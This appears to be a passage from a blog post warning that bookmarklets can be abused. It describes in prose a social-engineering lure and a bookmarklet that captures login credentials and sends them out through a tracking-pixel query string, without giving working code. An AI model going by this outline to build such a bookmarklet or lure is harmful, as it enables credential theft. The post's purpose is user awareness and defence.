In your address bar type:
and press the enter key.
Nobody would try to type that in!
But if you can social engineer someone to copy and paste malicious code into the address bar, couldn’t you just as easily social engineer them to drag a bookmarklet from a web page to their favorites or bookmark bar and click it?
You may have seen a warning message when you did that. Newer versions of IE and Opera provide a warning when you drag and drop a bookmarklet onto the favorites bar. Other browsers don’t.
While browsers prevent typing the bookmarklet directly into the browser’s address bar, they don’t do anything to stop you from adding a bookmarklet.
Returning to the Facebook example above, Facebook does not let you add a bookmarklet to a Facebook post. Instead you would create a post with a link to a page with the bookmarklet on it. The post in Facebook would tell the victim to visit a page, the page would hook them with an offer, tell them to drag and drop the bookmarklet onto the bookmark bar, and then tell them to return to Facebook and click on the bookmarklet to win some fabulous prize.
What could a malicious bookmarklet do? If it was well-written, it could do something really useful so that you would keep using it while it worked its evil behind the scenes. (Did you drag the hi bookmarklet to your bookmark bar? Don’t panic!)
For example, it could also monitor the page you are on when you click it and look for forms with password fields. If there was one, then it would wait until the form was submitted, then collect the username and password, and send it to a third party server by appending it as a query string at the end of an image, a technique known as pixel tracking, which is what google analytics does.
What does this all mean to users? Should they not use bookmarkets? As I said at the beginning, I am a fan of bookmarklets, and I don’t want to see them blocked. They can be extremely useful. But users need to be aware of the potential dangers. They should only save bookmarklets from sites they trust. As with any download (be it a bookmarklet or program), be cautious and make sure you are downloading from the actual site and not a phished site (one that looks authentic), or a third-party site that purports to have the same bookmarklet.
I think that IE now has it right. Whenever you drag a bookmarklet to the bookmark/favorites bar you should see a warning.
“Knowledge comes by eyes always open and working hands;
and there is no knowledge that is not power.”